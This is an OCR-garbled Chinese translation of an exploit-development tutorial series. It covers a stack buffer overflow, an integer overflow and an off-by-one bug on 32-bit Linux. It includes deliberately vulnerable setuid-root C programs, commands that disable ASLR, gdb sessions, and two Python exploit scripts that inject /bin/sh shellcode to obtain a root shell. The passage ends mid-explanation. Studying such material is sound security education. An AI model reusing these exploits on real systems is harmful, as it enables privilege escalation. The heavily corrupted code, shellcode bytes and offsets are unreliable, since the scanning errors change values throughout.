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释放 后 使 用 飞龙 


典型 的 基于 堆栈 的 缓冲 区 溢出 


译 者 : hackyzh 
原文 : Classic Stack Based Buffer Overflow 
虚拟 机 安装 : Ubuntu 12.04 (x86) 


这 个 帖子 是 最 简单 的 漏洞 开发 教程 系列 ， 在 互联 网 上 你 可 以 找到 很 多 关于 它 的 广 
章 。 尺 管 它 丰富 和 熟悉 ， 我 更 喜欢 自己 写 博客 文章 ， 因 为 它 将 作为 我 未 来 许多 职位 
的 先决 条 件 ! 


什么 是 缓冲 区 溢出 ? 

将 源 缓 冲 区 复制 到 目标 缓冲 区 可 能 导致 溢出 

1、 源 字符 串 长 度 大 于 目标 字符 串 长 度 。 

2、 不 进行 大 小 检查 。 

缓冲 区 溢出 有 两 种 类 型 : 

1、 基 于 堆栈 的 缓冲 区 溢出 - 这 里 的 目标 缓冲 区 位 于 堆栈 中 
2、 基 于 堆 的 缕 冲 区 溢出 - 这 里 的 目标 绥 冲 区 位 于 堆 中 


在 这 篇 文章 中 ， 我 将 只 讨论 基于 堆栈 的 缓冲 区 溢出 。 堆 溢出 将 在 Linux (x86) 漏洞 
开发 教程 系列 的 “3 级 "中 讨论 | 


缓冲 区 溢出 错误 导致 任意 代码 执行 ! 
什么 是 任意 代码 执行 ? 


任意 代码 执行 允许 攻击 者 执行 他 的 代码 以 获得 对 受害 机 器 的 控制 。 受 害 机 器 的 控制 
是 通过 多 种 方式 实现 的 ， 例 如 产生 根 shell， 添 加 新 用 户 ， 打 开 网 口 等 ... 


听 起 来 很 有 趣 ， 足 够 的 定义 让 我 们 看 看 缓冲 区 溢出 攻击 的 代码 | 
漏洞 代码 


//vuln.c 
#include <stdio.h> 
#include <string.h> 
int mainm Ent argc, char argv| I) { 
7 [4] char ibutizse]; 
/* [2] *7 strcpy(buf,argv[1]); 
7 E Z Printi ( Tnputs9ss xn^ burn); 
(ge teu 


编译 代码 


Zecho 0 > /proc/sys/kernel/randomize va space 

$gcc -g -fno-stack-protector -z execstack -o vuln vuln.c 
$sudo chown root vuln 

$sudo chgrp root vuln 

$sudo chmod +s vuln 


上 述 漏洞 代码 的 [2] 行 显 示 了 缓冲 区 溢出 错误 。 这 个 bug 可 能 导致 任意 代码 执行 ， 
因为 源 缓 冲 区 内 容 是 用 户 输入 的 1 


如 何 执行 任意 代码 执行 ? 


使 用 称 为 “ 返回 地 址 敌 盖 "的 技术 实现 任意 代码 执行 。 这 种 技术 有 助 于 攻击 者 履 盖 位 
于 堆栈 中 的 “返回 地 址 ”， 并且 这 种 覆盖 将 导致 任意 代码 执行 。 


在 研究 漏洞 代码 之 前 ， 为 了 更 好 的 理解 ， 让 我 们 反 汇 编 并 且 绘 制 出 漏洞 代码 的 堆栈 
布局 。 


反 汇 编 


(gdb) disassemble main 


Dump of assembler code for function main: 


//Function Prologue 

0x08048414 <+0>:push 
ler's ebp 

0x08048415 <+1>:mov 
's ebp to esp 

0x08048417 <+3>:and 

0x0804841a <+6>:sub 
e for local variables 

0x08048420 <+12>:mov 
V 

0x08048423 <+15>:add 
gv[1] 

0x08048426 <+18>:mov 
v[1] 

0x08048428 <+20>:mov 
g2 

0x0804842C <+24>:lea 
bp I 

0x08048430 <+28>:mov 
gi 

0x08048433 <+31>:call 


0x08048438 <+36>:mov 
mat str "Input:%s\n" 

0x0804843d <+41>:lea 

0x08048441 <+45> :mov 
g2 

0x08048445 <+49> :mov 
g1 

0x08048448 <+52>:call 
tf 

0x0804844d <+57>:mov 
lue 0 

//Function Epilogue 

0x08048452 <+62>:leave 
esp; pop ebp; 

0x08048453 <+63>:ret 
End of assembler dump. 


(gdb) 


堆栈 布局 : 


%ebp 
Kesp,%ebp 


soxffrrfffo,%esp 
$0x110, %esp 


Oxc(%ebp) , %eax 

$0x4, %eax 

(%eax) , ?6eax 
?6eax, Ox4 (96esp) 
Ox10(%esp), %eax 

Keax, (%esp) 

0x8048330 <strcpy@plt> 
$0x8048530, %eax 


0x10(96esp),9cedx 
%edx, Ox4(%esp) 


?6eax, (%esp) 
0x8048320 <printf@plt> 


$0x0,96eax 


//backup cal 
//set callee 


// 栈 对 齐 
//stack Spac 


//eax = arg 


//eax - &ar 
//eax - arg 
//strcpy ar 
//eax - 'bu 
//strcpy ar 
//call strc 


//eax - for 


//edx - buf 
//printf ar 


//printf ar 
//call prin 


//return va 


//mov ebp, 


//return 


Oxbffff1fc Return Address 


Oxbffff1f8 


+— buf ends here 


OxbffffOfO -—— bu f starts here 


e ESP - Stack Pointer - 
Used to point to top of 
the stack 
m ESP e EBP - Frame Pointer - 
Used to access 
function arguments 
main() Stack Layout and local variables. 


因为 我 们 已 经 知道 用 户 输 入 的 大 于 256， 将 溢出 目标 缓冲 区 并 覆盖 堆栈 中 存储 的 返 
回 地 址 。 通 过 发 送 一 系列 A 来 测试 它 。 


OxbffffOeO 





测试 步骤 1 : ZETA SR? 


$ gdb -q vuln 

Reading symbols from /home/sploitfun/lsploits/new/csof/vuln...do 

ne. 

(gdb) r ^python -c 'print "A"*300'^ 

Starting program: /home/sploitfun/lsploits/new/csof/vuln ‘python 
-C "print "A"*300 

Input :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

Program received signal SIGSEGV, Segmentation fault. 

0x41414141 in ?? () 

(gdb) p/x $eip 

$1 = 0x41414141 

(gdb) 


以 上 输出 显示 指令 指针 寄存 器 (EIP) 被 AAAA BE RHA Be ER EHE 
是 可 能 的 | 

测试 步骤 2 : 目的 缓冲 区 的 偏 移 量 是 多 少 ? 

这 里 让 我 们 找 出 返回 地 址 相对 与 目的 缓冲 区 buf 的 偏 移 量 。 在 反 汇 编 并 绘制 

了 main 的 堆栈 布局 后 ， 现 在 可 以 尝试 找到 偏 移 位 置信 息 ! 堆栈 布局 显示 返回 地 
址 位 于 距 目 标 缓冲 区 buf 的 偏 移 ( Oxi10c ) 处 。 9x16c 计算 如 下 : 


Ox10c = 0x100 + 0x8 + 0x4 


其 中 


0x100 is ‘buf’ 大 小 
Ox8 is 对 齐 空间 ”// 这 里 有 点 不 太 明 白 为 哈 需 要 对 齐 
0x4 is 调用 者 的 ebp 


因此 ， 用 户 输入 的 "A" * 268 + "Bv * 4 ^» I$ X f buf ， 对 齐 空间 和 调用 者 的 
ebp &% A 并 且 返 回 地 址 变 为 BBBB 


$ gdb -q vuln 

Reading symbols from /home/sploitfun/lsploits/new/csof/vuln...do 

ne. 

(gdb) r “python -c 'print "A"*268 + "B"*4 

Starting program: /home/sploitfun/lsploits/new/csof/vuln “python 
-C 'print "A"*268 十 DIAM = 

Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

AAAAAAAAAAAAAAAAAABBBB 

Program received signal SIGSEGV, Segmentation fault. 

0x42424242 in ?? () 

(gdb) p/x $eip 

$1 = 0x42424242 

(gdb) 


以 上 输出 显示 攻击 者 可 以 控制 返回 地 址 。 位 于 堆栈 位 置 ( Oxbffffifc ) 的 返回 
地 址 被 BBBB SS, 4 44 人 信息， 我们 可 以 编写 一 个 漏洞 利用 程序 来 实现 任意 
的 代码 执行 。 


攻击 代码 : 


#exp . py 

#!/usr/bin/env python 

import struct 

from subprocess import call 

#Stack address where shellcode is copied. 
ret addr = Oxbffffi1dO 


#Spawn a shell 
#execve(/bin/sh) 
scode = "\x31\xcO\x50\x68\x2F\x2F\xX73\x68\ x68\x2F\x62\x69\x6e\x8 
9\xe3\x50\x89\xe2\x53\x89\xe1\xbO\xOb\xcd\x80" 
#endianess convertion 
def conv(num): 
return struct.pack("<I",numnk + RA + NOP's + Shellcode 
buf = "A" * 268 
buf += conv(ret addr) 
buf += "\x90" * 100 
buf += scode 
print "Calling vulnerable program" 
call(["./vuln", buf]) 


执行 上 面 的 exploit 程 序 ， 给 了 我 们 root shell? w FAT : 


$ python exp.py 

Calling vulnerable program 
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAÓGGG66660606606606060606060006060000060060606600060600066 
6666666606006666660600006606660606060060606660600606000606060060060060066060016Ph./ / 
shh/bin66GP66s666 

4 id 

uid-1000(sploitfun) gid-1000(sploitfun) euid-O(root) egid=0(root 
) groups=0(root),4(adm), 24(cdrom), 27(sudo), 30(dip),46(plugdev),1 
09(lpadmin),124(sambashare), 1000(sploitfun) 

# exit 

$ 


注意 : 为 了 获得 这 个 root shell， 我 们 关闭 了 许多 漏洞 利用 缓解 技术 。 对 于 所 有 文章 
中 的 1 级 ， 我 已 经 禁用 了 这 些 利 用 减轻 技术 ， 因 为 第 1 级 的 目标 是 向 您 介绍 漏洞 。 当 
我 们 进入 Linux (x86) 利用 开发 教程 系列 的 “2 级 "时 ， 首 正 的 乐趣 会 发 生 在 这 里 ， 我 
将 在 此 讨论 绕 过 这 些 利 用 减轻 技术 | 


整数 溢出 


译 者 : hackyzh 

原文 : Integer Overflow 
虚拟 机 安装 : Ubuntu 12.04 (x86) 
什么 是 整数 溢出 ? 
存储 大 于 最 大 支持 值 的 值 称 为 整数 溢出 。 整 数 溢出 本 身 不 会 导致 任意 代码 执行 ， 但 
整数 溢出 可 能 会 导致 堆栈 溢出 或 堆 溢 出 ， 这 可 能 导致 任意 代码 执行 。 在 这 篇 文章 
中 ， 我 将 仅 谈 论 整数 溢出 导致 堆栈 溢出 ， 整 数 溢 出 导致 堆 溢出 将 在 后 面 的 单独 的 帖 
子 中 讨论 9 
数据 类 型 大 小 及 范围 : 


Data Type Size Unsigned Range Signed Range 
char 1 0 to 255 -128 to 127 
short 2 0 to 65535 -32768 to 32767 

int 4 0 to 4294967296 -2147483648 to 
2147483647 


当 我 们 试图 存储 一 个 大 于 最 大 支持 值 的 值 时 ， 我 们 的 值 会 被 包装 。 例 如 ， 当 我 们 党 
试 将 2147483648 存储 到 带 符号 的 int 数据 类 型 时 ， 它 将 被 包装 并 存储 
为 -21471483648 。 这 被 称 为 整数 溢出 ， 这 种 溢出 可 能 导致 任意 代码 执行 


para 


类 似 地 ， 存 储 小 于 最 小 支持 值 的 值 称 为 整数 下 溢 。 例 如 ， 当 我 们 尝试 

将 -2147483649 存储 到 带 符 号 的 int 数 据 类 型 时 ， 它 将 被 包装 并 存储 

为 21471483647 .这 称 为 整数 下 溢 。 在 这 里 我 只 会 谈论 整数 溢出 ， 但 是 这 个 过 程 对 
于 下 溢 也 是 一 样 的 ! 


漏洞 代码 : 


DEG 

include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 


void store_passwd_indb(char* passwd) { 


} 


void validate_uname(char* uname) { 


} 


void validate_passwd(char* passwd) { 
char passwd_buf[11]; 
unsigned char passwd_len = strlen(passwd); /* [1] */ 
if(passwd_len >= 4 && passwd_len <= 8) { /* [2] */ 
printf("Valid Password\n"); /* [3] 77 


fflush(stdout); 

strcpy(passwd buf,passwd); /* [4] */ 

) else { 

praintT (“invalid Password\n"); /* [5] */ 
fflush(stdout); 
} 
store passwd indb(passwd buf); /* [6] */ 


j 


int main(int argc, char* argv[]) { 
if(argc!-3) { 
printf("Usage Error: HE 
fflush(stdout); 
exit(-1); 
} 
validate uname(argv[1]); 
validate passwd(argv[2]); 
rete mao 


编译 命令 


Zecho 0 > /proc/sys/kernel/randomize va space 

$gcc -g -fno-stack-protector -z execstack -o vuln vuln.c 
$sudo chown root vuln 

$sudo chgrp root vuln 

$sudo chmod +S vuln 


上 述 漏洞 代码 的 [1] 行 显示 了 一 个 整数 溢出 错误 。 strlen 的 返回 类 型 
是 size t ( unsigned int ) ， 它 存储 在 unsigned char 数据 类 型 中 。 
此 ， 任 何 大 于 unsigned char 的 最 大 支持 值 的 值 都 会 导致 整数 溢出 。 因 此 当 密 码 


长 度 为 261 时 ，261 将 被 包 庄 并 存储 为 passwd len 变量 中 的 5 ! 由 于 这 个 整数 溢 
出 ， 可 以 绕 过 行 [2] 执行 的 边界 检查 ， 从 而 导致 基于 堆栈 的 缓冲 区 溢出 ! 而 且 在 
这 篇 文章 中 看 到 ， 基 于 堆栈 的 缓冲 区 溢出 导致 任意 的 代码 执行 。 


在 研究 漏洞 代码 之 前 ， 为 了 更 好 的 理解 ， 我 们 可 以 反 汇 编 并 绘制 出 漏洞 代码 的 堆栈 
布局 | 


反 汇 编 : 
(gdb) disassemble validate passwd 


Dump of assembler code for function validate passwd: 
//Function Prologue 


0x0804849e <+0>: push %ebp //back 
up caller's ebp 

0x0804849f <+1>: mov %esp,%ebp //set 

callee's ebp to esp 

0x080484a1 <+3>: push %edi //back 
up edi 

0x080484a2 <+4>: sub $0x34,%esp //stac 
k space for local variables 

0x080484a5 <+7>: mov 0x8(%ebp),%eax //eax 

= passwd 

0x080484a8 <+10>: movl $0xffffffff,-Oxi1c(9?cebp) //Stri 
ng Length Calculation -- Begins here 


0x080484af <+17>: mov %eax, %edx 

0x080484b1 <+19>: mov $0x0, %eax 

0x080484b6 <+24>: mov -Ox1c(%ebp),%ecx 
0x080484b9 <+27>: mov %edx, %edi 

0x080484bb <+29>: repnz scas %es:(%edi),%al 
0x080484bd <+31>: mov %ecx, %eax 

0x080484bf <+33>: not %eax 


0x080484c1 <+35>: sub $0x1,%eax //Stri 
ng Length Calculation -- Ends here 

0x080484c4 <+38>: mov %al, -Ox9(96ebp) //pass 
wd_len = al 

0x080484c7 <+41>: cmpb $0x3, -0x9(%ebp) //if(p 
asswd len <= 4 ) 

0x080484cb <+45>: jbe 0x8048500 <validate_passwd+98> //jmp 
to 0x8048500 

0x080484cd <+47>: cmpb $0x8, -0x9(%ebp) //if(p 
asswd_len >=8) 

0x080484d1 <+51>: ja 0x8048500 <validate_passwd+98> //jmp 
to 0x8048500 

0x080484d3 «453»: movl $0x8048660, (%esp) //else 
arg - format string "Valid Password" 

0x080484da <+60>: call 0x80483a0 <puts@plt> //call 

puts 

0x080484df <+65>: mov 0x804a020, %eax //eax 
- stdout 

0x080484e4 <+70>: mov %eax, (%esp) //arg 


= stdout 


0x080484e7 <+73>: call 0x8048380 <fflush@plt> //call 
fflush 


0x080484ec <+78>: mov Ox8(%ebp), %eax //eax 
= passwd 

0x080484ef <+81>: mov %eax, OxA(96esp) //arg2 
= passwd 

0x080484f3 <+85>: lea -0x14(%ebp),%eax //eax 
= passwd buf 

0x080484f6 <+88>: mov %eax, (%esp) //argi 
= passwd buf 

0x080484f9 <+91>: call 0x8048390 <strcpy@plt> //call 
strcpy 


0x080484fe <+96>: jmp 0x8048519 «validate passwd-123» //jmp 
to 0x8048519 


0x08048500 <+98>: movl $0x804866f, (%esp) //arg 
- format string "Invalid Password" 

0x08048507 <+105>: call 0x80483a0 <puts@plt> //call 
puts 

0x0804850c <+110>: mov 0x804a020, %eax //eax 
- stdout 

0x08048511 <+115>: mov %eax, (%esp) //arg 
= stdout 

0x08048514 <+118>: call 0x8048380 <fflush@plt> //fflu 
sh 

0x08048519 <+123>: lea -0x14(%ebp),%eax //eax 
= passwd_buf 

0x0804851c <+126>: mov %eax, (%esp) //arg 
= passwd_buf 

0x0804851f <+129>: call 0x8048494 //call 


store_passwd_indb 


//Function Epilogue 


0x08048524 <+134>: add $0x34,%esp //unwi 
nd stack space 

0x08048527 <+137>: pop %edi //rest 
ore edi 

0x08048528 <+138>: pop %ebp //rest 
ore ebp 

0x08048529 <+139>: ret //retu 
rn 

End of assembler dump. 

(gdb) 


堆栈 布局 : 





Oxbffff21c 
4«————— EBP 





Oxbffff218 
Oxbffff204 | 
e ESP - Stack Pointer - 
- Used to point to top of 
OxbffffieO | | *—— — ESP the stack 
e EBP - Frame Pointer - 
main() Stack Layout Used to access 


function arguments 
and local variables. 


由 于 我 们 已 经 知道 长 度 e ， 所 以 绕 过 边界 检查 ， 并 允许 我 们 覆盖 堆栈 中 


的 返回 地 址 。 让 我 们 通 一 系列 的 A 来 测试 它 。 
测试 步骤 1 : 是 否 可 以 覆盖 返回 地 址 ? 


$ gdb -q vuln 

Reading symbols from /home/sploitfun/lsploits/iof/vuln...(no deb 
ugging symbols found)...done. 

(gdb) r sploitfun “python -c 'print "A"*261'" 

Starting program: /home/sploitfun/lsploits/iof/vuln sploitfun `p 
ython -c 'print "A"*261'" 

Valid Password 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 

(gdb) p/x $eip 

$1 - 0x41414141 


(gdb) 


测试 步骤 2 : 目的 缓冲 区 的 偏 移 量 是 多 少 ? 
这 里 让 我 们 从 缓冲 区 passwd_buf 中 找 出 什么 偏 移 返回 地 址 。 反 汇 编 并 绘制 


2 validate passwd 的 堆栈 布局 ， 现 在 可 以 尝试 找到 偏 移 位 置信 息 ! 堆栈 布局 显 
返回 地 址 位 于 缓冲 区 passwd_buf 的 偏 移 ( 0x18 ) ^b» 0x18 计算 如 下 : 


0x18 = Oxb + Ox1 + Ox4 + Ox4 + 0x4 
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ET 


Oxb is 'passwd buf' size 
Ox1 is 'passwd len' size 
0x4 is alignment space 
0x4 is edi 

0x4 is caller's EBP 


因此 ， 用 户 输 入 的 "A" * 94 + "B" * 4 + "C" * 233 ^ VA A ZS 
E passwd buf > passwd len ， 对 齐 空间 ，edi 和 调用 者 的 ebp， 以 BBBB SS 
返回 地 址 ， 以 C 替 盖 剩余 空间 . 


$ gdb -q vuln 

Reading symbols from /home/sploitfun/lsploits/iof/vuln...(no deb 
ugging symbols found)...done. 

(gdb) r sploitfun “python -c 'print "A"*24 + "B"*4 + "C"*233'"^ 
Starting program: /home/sploitfun/lsploits/iof/vuln sploitfun `p 
ython c "print "A"*24 + "BM*4- + 100423317 

Valid Password 


Program received signal SIGSEGV, Segmentation fault. 
0x42424242 in ?? () 

(gdb) p/x $eip 

$1 = 0x42424242 


(gdb) 


以 上 输出 显示 攻击 者 可 以 控制 返回 地 址 。 位 于 堆栈 位 置 ( Ooxbffffifc ) 的 返回 
地 址 被 BBBB 履 盖 。 有 了 这 些 信息 ， 我 们 可 以 编写 一 个 漏洞 利用 程序 来 实现 任意 的 
代码 执行 。 


利用 代码 : 


#exp. py 

#!/usr/bin/env python 
import struct 

from subprocess import call 


arg1 = "sploitfun" 


#Stack address where shellcode is copied. 
ret addr = Oxbffff274 


#Spawn a shell 

#execve(/bin/sh) 

scode = "NXx31NXcONXx5ONX68NX2fT NX2fNX73NX68NX68NX2f NX62NX69Nx6eNx8 
9\xe3\x50\x89\xe2\x53\x89\xel\xbO\xOb\xcd\x80" 


#endianess convertion 
def conv(num): 
return struct.pack("<I",numunk + RA + NOP's + Shellcode 
arg2 = "A" * 24 
arg2 += conv(ret addr); 
arg2 += "\x90" * 100 
arg2 += scode 
arg2 += "C" * 108 


print "Calling vulnerable program" 
call(["./vuln", argi, arg2]) 


执行 上 面 的 exploit 程 序 ， 给 我 们 root shell (如 下 所 示 ) 


$ python exp.py 

Calling vulnerable program 

Valid Password 

4 id 

uid=1000(sploitfun) gid-1000(sploitfun) euid=0(root) egid=0(root 
) groups=0(root),4(adm),24(cdrom),27(sudo), 30(dip), 46(plugdev),1 
09(lpadmin),124(sambashare),1000(sploitfun) 

# exit 

$ 


http://phrack.org/issues/60/10.html 


Off-By-One 漏洞 (基于 栈 ) 


译 者 : hackyzh 
原文 : Off-By-One Vulnerability (Stack Based) 
虚拟 机 安装 : Ubuntu 12.04 (x86) 
什么 是 off by one ? 
将 源 字符 串 复 制 到 目标 缓冲 区 可 能 会 导致 off by one 
1、 源 字符 串 长 度 等 于 目标 缓冲 区 长 度 。 
当 源 字符 串 长 度 等 于 目标 缓冲 区 长 度 时 ， 单 个 NULL 字 节 将 被 复制 到 目标 缓冲 区 上 
方 。 这 里 由 于 目标 缓冲 区 位 于 堆栈 中 ， 所 以 单个 NULL 字 节 可 以 覆盖 存储 在 堆栈 中 
的 调用 者 的 EBP 的 最 低 有 效 位 《LSB) ， 这 可 能 导致 任意 的 代码 执行 。 
一 如 既往 的 充分 的 定义 ， 让 我 们 来 看 看 off by one 的 漏洞 代码 ! 
漏洞 代码 : 


AVIS E 
include <stdio.h> 
#include <string.h> 


void foo(char^ arg); 
void bar(char* arg); 


void foo(char* arg) { 
bar(arg); /* [1] */ 
} 


void bar(char* arg) { 

char buf[256]; 

strepy( bur, arg); /* [21 7 
} 


int main(int argc, char *argv[]) { 
if(strlen(argv[1])>256) 4 /* [3] */ 
printf("Attempted Buffer Overflow\n"); 
fflush(stdout); 
return -1; 


} 
foo(argv[1]); /* [4] */ 


return 0; 


j 


编译 命令 


#echo 0 > /proc/sys/kernel/randomize va space 

$gcc -fno-stack-protector -z execstack -mpreferred-stack-boundar 
y-2 -o vuln vuln.c 

$sudo chown root vuln 

$sudo chgrp root vuln 

$sudo chmod +s vuln 


上 述 漏洞 代码 的 第 [2] 行 是 可 能 发 生 off by one 溢 出 的 地 方 。 目 标 缓冲 区 长 度 为 
256， 因 此 长 度 为 256 字 节 的 源 字 符 串 可 能 导致 任意 代码 执行 。 


如 何 执行 任意 代码 执行 ? 


使 用 称 为 EBP 履 盖 ?的 技术 实现 任意 代码 执行 。 如 果 调 用 者 的 EBP 位 于 目标 缓冲 区 
之 上 ， 则 在 strcpy 之 后 ， 单 个 NULL 字 节 将 覆盖 调用 者 EBP 的 LSB。 要 了 解 更 多 
关于 off by one, 让 我 们 反 汇 编 漏 洞 代 码 并 绘制 它 的 堆栈 布局 。 


反 汇 编 : 
(gdb) disassemble main 


Dump of assembler code for function main: 
//Function Prologue 


0x08048497 <+0>: push %ebp //backup caller's 
ebp 

0x08048498 <+1>: mov %esp,%ebp //set callee's (m 
ain) ebp to esp 

0x0804849a <+3>: push %edi //backup EDI 
0x0804849b <+4>: sub $0x8,%esp //create stack sp 
ace 

0x0804849e <+7>: mov Oxc(%ebp),%eax //eax - argv 
0x080484a1 <+10>: add $0x4,%eax //eax = &argv[1] 
0x080484a4 <+13>: mov (%eax),%eax //eax - argv[1] 
0x080484a6 <+15>: movl $oxffffffff, -Ox8(%ebp) //String Length C 
alculation -- Begins here 


0x080484ad <+22>: mov %eax, %edx 

0x080484af <+24>: mov $0x0, %eax 

0x080484b4 <+29>: mov -0x8(%ebp),%ecx 
0x080484b7 <+32>: mov %edx,%edi 

0x080484b9 <+34>: repnz scas %es:(%edi),%al 
0x080484bb <+36>: mov %ecx, %eax 

0x080484bd <+38>: not %eax 


0x080484bf <+40>: sub $0x1,%eax //String Length C 
alculation -- Ends here 

0x080484c2 <+43>: cmp $0x100, %eax //eax = strlen(ar 
gv[1]). if eax > 256 

0x080484c7 <+48>: jbe 0x80484e9 <main+82> //Jmp if NOT grea 
ter 

0x080484c9 <+50>: movl $0x80485e0, (%esp) //If greater prin 


t error string, flush and return. 
0x080484dO0 <+57>: call 0x8048380 <puts@plt> 
0x080484d5 <+62>: mov 0x804a020, %eax 


0x080484da 
0x080484dd 
0x080484e2 
0x080484e7 
0x080484e9 
eax = argv 
0x080484ec 
0x080484ef 
0x080484f1 
0x080484f4 
0x080484f9 


//Function 
0x080484fe 
ace 
0x08048501 
0x08048502 
0x08048503 


<+67>: 
<+70>: 
<+75>: 
<+80>: 
<+82>: 


<+85>: 
<+88>: 
<+90>: 
<+93>: 
<+98>: 


mov %eax, (%esp) 

call 0x8048360 <fflush@plt> 
mov $0x1,%eax 

jmp 0x80484fe <main+103> 
mov Oxc(%ebp) , %eax 

add $0x4, %eax 
mov (%eax),%eax 
mov %eax, (%esp) 
call 0x8048464 
mov $0x0,96eax 


Epilogue 
<+103>: add $0x8,%esp 


<+106>: pop %edi 
<+107>: pop %ebp 


<+108>: 


ret 


End of assembler dump. 

(gdb) disassemble foo 

Dump of assembler code for function foo: 
//Function prologue 

0x08048464 «40»: push %ebp 


(main) ebp 


0x08048465 <+1>: mov %esp,%ebp 
00) ebp to esp 
0x08048467 <+3>: sub $0x4,%esp 


ace 
0x0804846a 
0x0804846d 

rg 
0x08048470 


//Function 
0x08048475 


<+6>: mov Ox8(%ebp), %eax 
<+9>: mov %eax, (%eSp) 


<+12>: 


call 0x8048477 


Epilogue 


<+17>: 


ace + restore ebp 


0x08048476 <+18>: 


leave 


ret 


End of assembler dump. 

(gdb) disassemble bar 

Dump of assembler code for function bar: 
//Function Prologue 

0x08048477 «40»: push %ebp 


(foo) ebp 


0x08048478 <+1>: mov %esp,%ebp 
ar) ebp to esp 
<+3>: sub $0x108,%esp 


0x0804847a 
ace 
0x08048480 
0x08048483 
0x08048487 
0x0804848d 
0x08048490 


<+9>: mov 0X8(%ebp )，%eax 


<+12>: 
<+16>: 
<+22>: 
<+25>: 


mov %eax, Ox4(%esp) 

lea -0x100(%ebp), %eax 

mov %eax, (%esp) 

call 0x8048370 <strcpy@plt> 


//argv[1] <= 256, 


//eax = &argv[1] 
//eax = argv[1] 
//foo arg 
//call foo 


//return value 


//unwind stack sp 
//restore EDI 


//restore EBP 
//return 


//backup caller's 
//set callee's (f 
//create stack sp 


//foo arg 
//bar arg - foo a 


//call bar 


//unwind stack sp 


//return 


//backup caller's 
//set callee's (b 
//create stack sp 


//bar arg 
//strcpy arg2 
//buf 
//strcpy argi 
//call strcpy 


Off-By-One AA (AFR) 


//Function Epilogue 
0x08048495 <+30>: leave 
ace + restore ebp 
0x08048496 <+31>: ret 
End of assembler dump. 
(gdb ) 


//return 


堆栈 布局 


OUxbffff278 


main's Stack Frame 


foo's Stack Frame 个 Oxbffff264 


Oxbffff258 + EBP 


ën buf end 


bars Stack Frame 


oOxbfff204 | 


Oxbffff200 | 


0xbffff158 | | + buf start 





vuln's stack layout with attacker data 


//unwind stack sp 


当 我 们 已 经 知道 256 字 节 的 用 户 输入 ， 用 空 字 节 可 以 覆盖 foo 的 EBP 的 LSB。 所 以 


当 foo 的 存储 在 目标 缓冲 区 buf 之 上 的 EBP 被 一 个 NULL FY AA ži > ebp 


从 exbffff2d8 变 为 exbffff200 。 从 堆栈 布局 我 们 可 以 看 到 堆栈 位 


ZS Oxbffff200 是 目标 缓冲 区 buf 的 一 部 分 ， 由 于 用 户 输 入 被 复制 到 该 目标 缓冲 
区 ， 攻 击 者 可 以 控制 这 个 堆栈 位 置 ( oxbffff200 ) ， 因 此 他 控制 指令 指针 (eip 


) 使 用 他 可 以 实现 任意 代码 执行 。 让 我 们 通过 发 送 一 系列 256 的 “A” 来 测试 它 。 


测试 步骤 1 : EBP 是 否 覆 盖 ， 从 而 可 能 覆盖 返回 地 址 ? 
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(gdb) r “python -c "print "A"*256'` 
Starting program: /home/sploitfun/lsploits/new/obo/stack/vuln `p 
ython -c 'print "A"*256'"^ 


Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 

(gdb) p/x $eip 

$1 = 0x41414141 


(gdb) 


WA bin &RuTEBPA Ec RN EZI A4 (EIP) © 
测试 步骤 2 : 距离 目标 缓冲 区 的 偏 移 是 多 少 ? 


现在 ， 我 们 可 以 从 目标 缓冲 区 buf 的 起 始 位 置 开 始 找到 偏 移 量 ， 我 们 需要 替换 我 
on 漏洞 中 ， 我 们 不 会 {oo o Im 回 地 
中 〈 像 我 们 在 基于 堆栈 的 缓冲 区 溢出 中 ) ， 而 是 攻击 者 控制 的 目标 缓冲 区 buf 内 
een 。 因 此 ， 我 们 需 
SEET 个 返回 地 址 位 置 偏 移 量 (从 buf ) ， 它 是 目标 缓冲 区 buf 本 身 的 一 部 
是 很 清楚 ， 但 是 没有 问题 继续 阅读 | 


现在 让 我 们 尝试 从 文本 段 地 址 0x08048490 开始 了 解 CPU 的 执行 情况 。 


e 0x08048490 -调用 strcpy -此 指令 执行 导致 逐个 溢出 ， 因 此 foo 的 EBP 
E (存储 在 堆栈 位 置 Oxbffff2cc ) 从 9xbffff2d8 更 改 为 oxbffff200 > 
e 0x08048495 - leave - leave 指令 解 开 此 函数 的 堆栈 空间 并 恢复 ebp。 


leave: mov ebp, esp; //unwind stack space by setting esp 
to ebp. 
pop ebp; //restore ebp 
*** As per our example: *** 
leave: mov ebp, esp; //esp - ebp - Oxbffff2cc 
pop ebp; //ebp - Oxbffff200 (Overwritten EBP 


value is now stored in ebp register); esp - Oxbffff2dO 


e 0x08048495 - ret -返回 到 foo 的 指令 rm 
e 0x08048475 - leave - leave 指令 解除 C ES Be AY HE RK IRL JE XL ebp > 


*** As per our example: *** 


leave: mov ebp, esp; //esp = ebp = Oxbffff200 (As part of 
unwinding esp is shifted down instead of up!!) 
pop ebp; //ebp = 0x41414141; esp = Oxbffff204 


e 0x08048476 - ret -返回 到 位 于 ESP ( oxbffff204 ) 的 指令 。 现 在 ， 
ESP 指 向 攻击 者 控制 的 缓冲 区 ， 因 此 攻击 者 可 以 返回 到 任何 要 实现 任意 代码 执 
行 的 位 置 。 


现在 让 我 们 回 到 我 们 原始 的 测试 ， 找 到 从 目标 缓冲 区 buf 到 返回 地 址 的 偏 移 量 。 
如 我 们 的 堆栈 布局 图 所 示 ， buf 位 于 9xbffff158 ， 在 CPU 执行 后 ， 我 们 知道 目 
